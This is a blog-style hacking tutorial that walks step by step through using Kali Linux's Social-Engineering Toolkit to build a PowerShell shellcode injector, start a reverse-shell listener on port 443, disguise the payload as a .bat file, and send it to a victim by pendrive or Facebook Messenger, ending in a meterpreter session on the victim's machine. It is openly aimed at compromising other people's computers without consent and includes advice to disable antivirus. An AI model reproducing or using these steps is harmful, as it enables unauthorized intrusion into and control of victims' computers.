So, You want to know how to hack a pc using Linux...
Then you are in the right edge.
Today am gonna show you how to hack pc using kali linux............
Firstly u need to get a linux software downloaded into your pc...
Here's the downloaded link of kali linux
and the other details of this installation is as same as ubuntu.....
- Start the linux o.s

>>After starting you will have your home page.
Then go to Applications..
Click on the Application and at the top of the applications list you can find a search bar .
Type Social Engineering tool.

set > 1
It takes time to load... and after it gets started you will find above screen.
Now, select the Social-Engineering Attacks from the options seen above in the picture.
and this leads to the screen shown below.....

Then select the Powershell Attack Vectors as option (9).
set> 9

Now click on the Powershell Alphanumeric Shellcode Injector as option (1).
set:powershell> 1
and later there will be a prompt saying,
------------Ip address for Payload listenerL(Host):[]
As we all know how to know the ip address in linux , the command is : ifconfig
So, by opening another terminal we can type that in root(#)
we can open another terminal, by right clicking on the terminal where you are presently working with.
we see the ip address as inet address:(192.168.205.132)of this type but the address given here cant be matched with yours. check out your ip as per command given above in the terminal
now copy the ip address from the terminal which we have opened, and paste that in the social engineering terminal as we are discussing about and press"Enter".
set> Ip address for Payload listenerL(Host): 192.168.205.132
Later,
the prompt gives you another message to go through..
Enter the port for the reverse [443] :
For the above one, the same number as seen in the brackets must be typed.
Enter the port for the reverse [443] : 443
and the running lines goes on till another message prompts for permission. i.e;
...If you want the powershell commands and attacks, they are exported to /root/.set/reports/powershell
set> Do you want to start the listener now [yes/no]: : yes
copy the highlighted code of above and
now again open a new Terminal ....
root@kali:~#cd /root/.set/reports/powershell/
root@kali:~/.set/reports/powershell# ls
powershell.rc x86_powershell_injection.txt
root@kali:~/.set/reports/powershell# cp x86_powershell_injection.txt ~/Desktop (for creating as a file on the desktop)
(note: Desktop ... D must be in capital and the remaining as small case )
Now see the Desktop of the linux, you can see the .txt file
And don't close the social engineering file, maintain it running.....and rest all terminal can be optional
Rename the file saved on the Desktop which was before as (x86_poowershell_injection.txt) into
(x86_poowershell_injection.bat)
.bat-------is an extension of batch file.
Now, copy the batch file and share it in the victim's pc or through pendrive or paste it in the facebook messenger, when the victim clicks on this batch file.. then we can get access to go through the victims pc. And while doing this (disable anti-virus for 10-20 minutes).

when victims open the sending stage runs....then we can see the victims ip address.
msf exploit (handler) >[*] sending stage ( some bytes) to ip address(192.168.205.1)---> victims ip address.
it takes 2-5 minutes.
and later,
msf (handler) > sessions -i 1
[*] starting interaction with 1......
meterpreter > sysinfo
(It gives the victims pc information)
meterpreter > help
( This gives you the full access with commands so you can go with that ...
Whatever commands you need you will get in this help command as typed above)

Like the above screen you will get options after clicking help.
Hope this will help you in small tech tooling of hacking pc's.
Be in touch with this for more updates......
will be waiting for your queries..........
Thanks you for your time.....


0 comments:
Post a Comment